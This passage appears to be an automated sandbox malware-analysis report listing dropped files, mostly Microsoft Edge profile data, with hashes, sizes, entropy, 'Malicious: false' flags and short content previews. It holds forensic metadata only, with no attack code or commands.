SSDEEP:	24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
MD5:	ADC0CFB8A1A20DE2C4AB738B413CBEA4
SHA1:	238EF489E5FDC6EBB36F09D415FB353350E7097B
SHA-256:	7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
SHA-512:	38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\65080268-5ade-471c-a27e-2dda90ea3fca.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\71c0e6d3-c0a3-4db1-8e02-418beff13d69.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.5559635235158827
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
MD5:	9AAAE8C040B616D1378F3E0E17689A29
SHA1:	F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
SHA-256:	5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
SHA-512:	436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports~RF350ff.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.36515621748816035
Encrypted:	false
SSDEEP:	24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
MD5:	25363ADC3C9D98BAD1A33D0792405CBF
SHA1:	D06E343087D86EF1A06F7479D81B26C90A60B5C3
SHA-256:	6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
SHA-512:	CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\ae2bda7c-6cca-4b74-b37a-4b4bffe8345c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\b7600d21-27d5-49e8-baa8-8770278beff2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.46731661083066856
Encrypted:	false
SSDEEP:	12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
MD5:	E93ACF0820CA08E5A5D2D159729F70E3
SHA1:	2C1A4D4924B9AEC1A796F108607404B000877C5D
SHA-256:	F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
SHA-512:	3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6973
Entropy (8bit):	4.938903222925794
Encrypted:	false
SSDEEP:	96:stLSwTEYd+s13ob91VZJ8z9r30Sd85eh66b7/x+6MhmuecmAebvAx2MTQyVrSJ:stLSwT+syZJk9r30k8EbV+FiAGePlWJ
MD5:	3D4EA67E9169D1A6E9BE595C4433FFA0
SHA1:	1B0469395B39C9113F876690D582188BFB233037
SHA-256:	4BE1D92418FEDE24140A2E6AF76EBAEECD83A87173CAF626318E0447591BAA0F
SHA-512:	930EE3F8A3F3D625CB02465918B68AFE532B6E8D0AC62CF14BFBAA92414954120C3072D3990C1DC05DE878BAB4E9C5E76278FD5CDEB85CF115E1F00AC3BD8A33
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380535955527806","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13380535954857809","domain_diversity":{"last_reporting_timestamp":"13380535955537256"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_sit

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25498
Entropy (8bit):	5.598235810792004
Encrypted:	false
SSDEEP:	768:n3BWVT8F1+UoAYDCx9Tuqh0VfUC9xbog/OVHLloTrUK7u:n3BWVTu1ja8LfQu
MD5:	E87ACC7D3468D71374A7AA2D0DFCB562
SHA1:	0F448599944586C665B87C976CFB668186FF79A5
SHA-256:	458E96909B0248D99C507F92CBFE2D0041DBF4FA7420471890A725D87F8EA251
SHA-512:	9F63EC0FE509286CC4C89F4D1BE37518EBA442279B14C08721E0A76D36814D1A8ADF99125D331196A1E2403A4A3A4D46556B011B623E438A4CB353686A5986E4
Malicious:	false
Preview:	{"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"state":1},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13340807286294146","location":5,"manifest":{"content_capabilities":{"include_globs":["https://excel.officeapps.live.com/","https://onenote.officeapps.live.com/","https://powerpoint.officeapps.live.com/","https://word-edit.officeapps.live.com/","https://excel.partner.officewebapps.cn/","https://onenote.partner.officewebapps.cn/","https://powerpoint.partner.officewebapps.cn/","https://word-edit.partner.officewebapps.cn/","https://excel.gov.online.office365.us/","https://onenote.gov.online.office365.us/","https://powerpoint.gov.online.office365.us/","https://word-edit.gov.online.office365.us/","https://*excel.dod.onli

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Secure Preferences~RF335f5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25498
Entropy (8bit):	5.598235810792004
Encrypted:	false
SSDEEP:	768:n3BWVT8F1+UoAYDCx9Tuqh0VfUC9xbog/OVHLloTrUK7u:n3BWVTu1ja8LfQu
MD5:	E87ACC7D3468D71374A7AA2D0DFCB562
SHA1:	0F448599944586C665B87C976CFB668186FF79A5
SHA-256:	458E96909B0248D99C507F92CBFE2D0041DBF4FA7420471890A725D87F8EA251
SHA-512:	9F63EC0FE509286CC4C89F4D1BE37518EBA442279B14C08721E0A76D36814D1A8ADF99125D331196A1E2403A4A3A4D46556B011B623E438A4CB353686A5986E4
Malicious:	false
Preview:	{"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"state":1},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13340807286294146","location":5,"manifest":{"content_capabilities":{"include_globs":["https://excel.officeapps.live.com/","https://onenote.officeapps.live.com/","https://powerpoint.officeapps.live.com/","https://word-edit.officeapps.live.com/","https://excel.partner.officewebapps.cn/","https://onenote.partner.officewebapps.cn/","https://powerpoint.partner.officewebapps.cn/","https://word-edit.partner.officewebapps.cn/","https://excel.gov.online.office365.us/","https://onenote.gov.online.office365.us/","https://powerpoint.gov.online.office365.us/","https://word-edit.gov.online.office365.us/","https://*excel.dod.onli

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	166
Entropy (8bit):	4.813382100471338
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFlskm/lldllaV93G4KGHS5dU6QqO9edUV:S85aEFlskm/lllaV935HcdU6QqPdUV
MD5:	D77F43329A44083EE64935AE3A3BA01C
SHA1:	2B63AD223621C8DADC013CAB6C8C5CD404F00085
SHA-256:	63549B849F3B4A2ACE989CE95C7700F7989AA99252EFA2261D499682F0AF2973
SHA-512:	475494AADD772B3CC84F905ED43061D5921CA62454F9A22E94FA73C514E41734597B6CCD02B53D15CD8BBAC832F226FD76867C3CED2B5DAA0627169F2776EA3A
Malicious:	false
Preview:	*...#................version.1..namespace-..&f...................b................next-map-id.1.Cnamespace-1fd6ccb7_7fd1_4300_9f1e_f0fb4b6a1ee0-https://ntp.msn.com/.0

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	265
Entropy (8bit):	5.09728331485636
Encrypted:	false
SSDEEP:	6:iOHeF+q1wkn23fpEyQM72KLldeUO4q2Pwkn23fpEyQMxIFUv:7+01fvLvtvYfSFUv
MD5:	5551D8FD68988D51AFB5208361BCE726
SHA1:	0B4802982EB704280E25C724F4977CB6876B2FD0
SHA-256:	D72FEABF7D7EC7779105E4DF73E930EC49C8472F4B38ADB873319AC31494990C
SHA-512:	7F2C81FEB4ABC12689759217FFF4FDA921345530A100715B1E078E6198D49148A21C6A9B44F2D79B287A2D41C7476BBCBF1D3BC4825A6A53D09D1C8C4DFDE890
Malicious:	false
Preview:	2025/01/05-02:32:35.316 1ed0 Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage since it was missing..2025/01/05-02:32:35.343 1ed0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Session Storage\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Sessions\Session_13380535955981382

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	257
Entropy (8bit):	3.9299501713387723
Encrypted:	false
SSDEEP:	6:3HzMoLtDUFM2yelhcdU6QqaKfbIgSx8lv837:3HYiDUCpMhSjdbdSxU837
MD5:	7A6062C4C55C68795FC06BA0FD4BF676
SHA1:	4CF5651A1C7964ECB10778F3E5264C43E37B0890
SHA-256:	14CD2E594A6D8B3E3802355E19F14AFB10BAB1E8408E031B41AB5F74CCE2F53E
SHA-512:	A295EAD38B3285612070C871502D9F4866134FE44E1E9DA47EECDC5BF9B8ADED03170338FCC7C350A79C7AA4E0F47CF373E56488E3CEDB77441B6F46797FDC48
Malicious:	false
Preview:	SNSS........@.`............@.`......".@.`............@.`........@.`........@.`........@.`....!...@.`................................@.`.@.`1..,....@.`$...1fd6ccb7_7fd1_4300_9f1e_f0fb4b6a1ee0....@.`........@.`...............@.`.......@.`....................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	3.473726825238924
Encrypted:	false
SSDEEP:	3:41tt0diERGn:et084G
MD5:	148079685E25097536785F4536AF014B
SHA1:	C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
SHA-256:	F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
SHA-512:	C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
Malicious:	false
Preview:	.On.!................database_metadata.1

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.062418554287223
Encrypted:	false
SSDEEP:	6:iOHQeQB1wkn23fpEAUh2gr52KLldYq2Pwkn23fpEAUh2ghZIFUv:7webfYhHJL0vYfYhHh2FUv
MD5:	021F966EAB6928B9A4ADFF1D41C7E948
SHA1:	E6BA8E98B64AD2E2BD4DBC1FA0A7D54DD10728BE
SHA-256:	27DA5999DFA843986319ABFDB1114B6D30F831B6BCED377CAC55DAA125EAFA3C
SHA-512:	4D8557B498951DA376EB1A4507160FD59420768A8D153058DB874A28786A73424B4F4CCE146F40C0606C1382EB4FAAEFE2C3E7B95950ECF47BC879F5FE28C6F9
Malicious:	false
Preview:	2025/01/05-02:32:33.287 eb0 Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database since it was missing..2025/01/05-02:32:33.367 eb0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
